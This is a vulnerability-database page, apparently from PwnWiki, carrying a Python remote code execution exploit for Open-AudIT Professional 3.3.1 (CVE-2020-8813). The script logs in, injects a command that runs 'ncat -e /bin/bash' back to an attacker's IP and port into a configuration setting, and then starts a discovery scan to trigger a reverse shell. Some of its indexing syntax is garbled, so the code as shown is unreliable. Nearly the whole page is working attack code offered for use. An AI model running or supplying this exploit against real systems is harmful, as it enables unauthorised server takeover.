Loading
0

Open-AudIT Professional 3.3.1 远程代码执行漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

EXP

# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24

#!/usr/bin/python3

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


if len(sys.argv) != 6:
    print("~ Usage : ./openaudit-exploit.py url username password ip port")
    exit()

url = sys.argv1
username = sys.argv2
password = sys.argv3
ip = sys.argv4
port = sys.argv5

request = requests.session()

def inject_payload():
    configuration_path = url+"/en/omk/open-audit/configuration/90"
    data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
    request.patch(configuration_path, data)
    print("+ Payload injected in settings")


def start_discovery():
    discovery_path = url+"/en/omk/open-audit/discoveries/create"
    post_discovery_path = url+"/en/omk/open-audit/discoveries"
    scan_name = "".join(random.choice(string.ascii_uppercase) for i in range(10))
    req = request.get(discovery_path)

    response = req.text
    soup = BeautifulSoup(response, "html5lib")
    token = soup.findAll('input')5.get("value")
    buttons = soup.findAll("button")
    headers = {"Referer" : discovery_path}
    request_data = {
    "dataattributesname":scan_name,
    "dataattributesothersubnet":"10.10.10.1/24",
    "dataattributesotherad_server":"",
    "dataattributesotherad_domain":"",
    "submit":"",
    "datatype":"discoveries",
    "dataaccess_token":token,
    "dataattributescomplete":"y",
    "dataattributesorg_id":"1",
    "dataattributestype":"subnet",
    "dataattributesdevices_assigned_to_org":"",
    "dataattributesdevices_assigned_to_location":"",
    "dataattributesothernmapdiscovery_scan_option_id":"1",
    "dataattributesothernmapping":"y",
    "dataattributesothernmapservice_version":"n",
    "dataattributesothernmapopen|filtered":"n",
    "dataattributesothernmapfiltered":"n",
    "dataattributesothernmaptiming":"4",
    "dataattributesothernmapnmap_tcp_ports":"0",
    "dataattributesothernmapnmap_udp_ports":"0",
    "dataattributesothernmaptcp_ports":"22,135,62078",
    "dataattributesothernmapudp_ports":"161",
    "dataattributesothernmaptimeout":"",
    "dataattributesothernmapexclude_tcp_ports":"",
    "dataattributesothernmapexclude_udp_ports":"",
    "dataattributesothernmapexclude_ip":"",
    "dataattributesothernmapssh_ports":"22",
    "dataattributesothermatchmatch_dbus":"",
    "dataattributesothermatchmatch_fqdn":"",
    "dataattributesothermatchmatch_dns_fqdn":"",
    "dataattributesothermatchmatch_dns_hostname":"",
    "dataattributesothermatchmatch_hostname":"",
    "dataattributesothermatchmatch_hostname_dbus":"",
    "dataattributesothermatchmatch_hostname_serial":"",
    "dataattributesothermatchmatch_hostname_uuid":"",
    "dataattributesothermatchmatch_ip":"",
    "dataattributesothermatchmatch_ip_no_data":"",
    "dataattributesothermatchmatch_mac":"",
    "dataattributesothermatchmatch_mac_vmware":"",
    "dataattributesothermatchmatch_serial":"",
    "dataattributesothermatchmatch_serial_type":"",
    "dataattributesothermatchmatch_sysname":"",
    "dataattributesothermatchmatch_sysname_serial":"",
    "dataattributesothermatchmatch_uuid":""

    }
    print("+ Creating discovery ..")
    req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
    disocvery_url = url + req.headers'Location' + "/execute"
    print("+ Triggering payload ..")
    print("+ Check your nc ;)")
    request.get(disocvery_url)


def login():
    login_info = {
    "redirect_url": "/en/omk/open-audit",
    "username": username,
    "password": password
    }
    login_request = request.post(url+"/en/omk/open-audit/login", login_info)
    login_text = login_request.text
    if "There was an error authenticating" in login_text:
        return False
    else:
        return True

if login():
    print("+ LoggedIn Successfully")
    inject_payload()
    start_discovery()
else:
    print("- Cannot login!")

pwnwiki.com